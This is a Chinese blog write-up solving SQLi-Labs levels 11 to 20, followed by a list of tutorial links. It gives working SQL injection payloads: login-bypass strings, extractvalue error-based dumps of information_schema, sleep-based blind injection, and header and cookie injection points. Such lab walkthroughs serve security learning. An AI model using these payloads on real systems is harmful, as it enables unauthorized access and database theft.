SQL Labs刷题补坑记录(less11-less20)
LESS11:
这里是post型注入,登录
admin' or '1 即可
LESS12:
括号闭合方式不同,"双引号闭合,
admin" )or 1#即可
LESS13:
admin' 报错了,那么可以尝试报错注入
admin') or 1# 显示登录成功,admin') or 0#登录失败,可以布尔盲注
报错注入:
admin') order by 2# 正常
admin') order by 3# 不正常
admin') union select 1,extractvalue(1,concat(0x7e,(select user()),0x7e)) # 结果如下图
进一步dump数据也是可以的
admin') union select 1,extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_scheme = 'security'),0x7e))#
数据太多只需要字符串截取函数截取一下就可以
admin') union select 1,extractvalue(1,concat(0x7e,substring((select group_concat(table_name) from information_schema.tables where table_scheme = 'security'),1,8),0x7e))#
LESS14:
闭合括号方式和13不同为",其他相同,盲注和报错注入都可以
LESS15:
这一关没有报错提示,因此不能报错注入,括号闭合为'单引号,
a' or 1# success
a' or 0# filed
因此可以bool盲注或者时间盲注
LESS16:
这一关和15一样,只是括号闭合方式为 ")
布尔盲注或者延时都可以
LESS17:
update型注入,修改密码处,password处随手' 单引号报错了,此时回显了逻辑
源码里面对uname进行了过滤
所以uname肯定不能注入了
并且在查到已经存在的用户才能够代入update进行更新,因此,所以用户名才要填admin
这里密码最好存的时候hash一下就好了,直接代入肯定有问题,update型注入和select 注入语法差不多,当然这里肯定可以用报错注入,但是不能够布尔盲注,因为这里update不会显示更新失败,除非是语句执行错误,
这里是没有逻辑的正确和错误的,所以盲注只能用延时注入,password 直接' or sleep(5)#即可,其他payload都是一样的
LESS18:
这一关考的是http header头注入,比如这里可以对ua进行注入:
LESS19:
对refeer进行诸注入,和18一样的
LESS20:
这里把第一次的用户名设置到cookie里,第二次又取cookie里的用户名进行了查询,所以cookie可以注入
原文地址:https://www.cnblogs.com/wfzWebSecuity/p/11304613.html
- MySQL 教程
- MySQL 安装
- MySQL 管理与配置
- MySQL PHP 语法
- MySQL 连接
- MySQL 创建数据库
- MySQL 删除数据库
- MySQL 选择数据库
- MySQL 数据类型
- MySQL 创建数据表
- MySQL 删除数据表
- MySQL 插入数据
- MySQL 查询数据
- MySQL where 子句
- MySQL UPDATE 查询
- MySQL DELETE 语句
- MySQL LIKE 子句
- mysql order by
- Mysql Join的使用
- MySQL NULL 值处理
- MySQL 正则表达式
- MySQL 事务
- MySQL ALTER命令
- MySQL 索引
- MySQL 临时表
- MySQL 复制表
- 查看MySQL 元数据
- MySQL 序列 AUTO_INCREMENT
- MySQL 处理重复数据
- MySQL 及 SQL 注入
- MySQL 导出数据
- MySQL 导入数据
- MYSQL 函数大全
- MySQL Group By 实例讲解
- MySQL Max()函数实例讲解
- mysql count函数实例
- MYSQL UNION和UNION ALL实例
- MySQL IN 用法
- MySQL between and 实例讲解
- 每日一问第2期 | final, finally, finalize 的区别?
- 当return遇到try、catch、finally时会发生什么?
- 五分钟C语言数据结构 之 二叉树层次遍历
- 为何IntelliJ IDEA比Eclipse好在哪里?
- 五分钟C语言数据结构 之 二叉树中序遍历
- Django 安全之跨站点请求伪造(CSRF)保护
- 五分钟C语言数据结构 之 二叉树先序遍历
- Java 语言基础(常用设计原则和设计模式,常用 Java 8~11 新特性)
- 五分钟C语言数据结构 之 二叉树后序遍历(非递归很重要)
- 5分钟Flink - 自定义Source源
- 9.深入k8s:调度器及其源码分析
- 5分钟Flink - 自定义Data Sink
- 5分钟Flink - 流处理API转换算子集合
- 视频上云/网络穿透/网络映射服务EasyNTS前端组织添加页面出现Vue冲突怎么解决?
- Pinpoint 一款强大的APM工具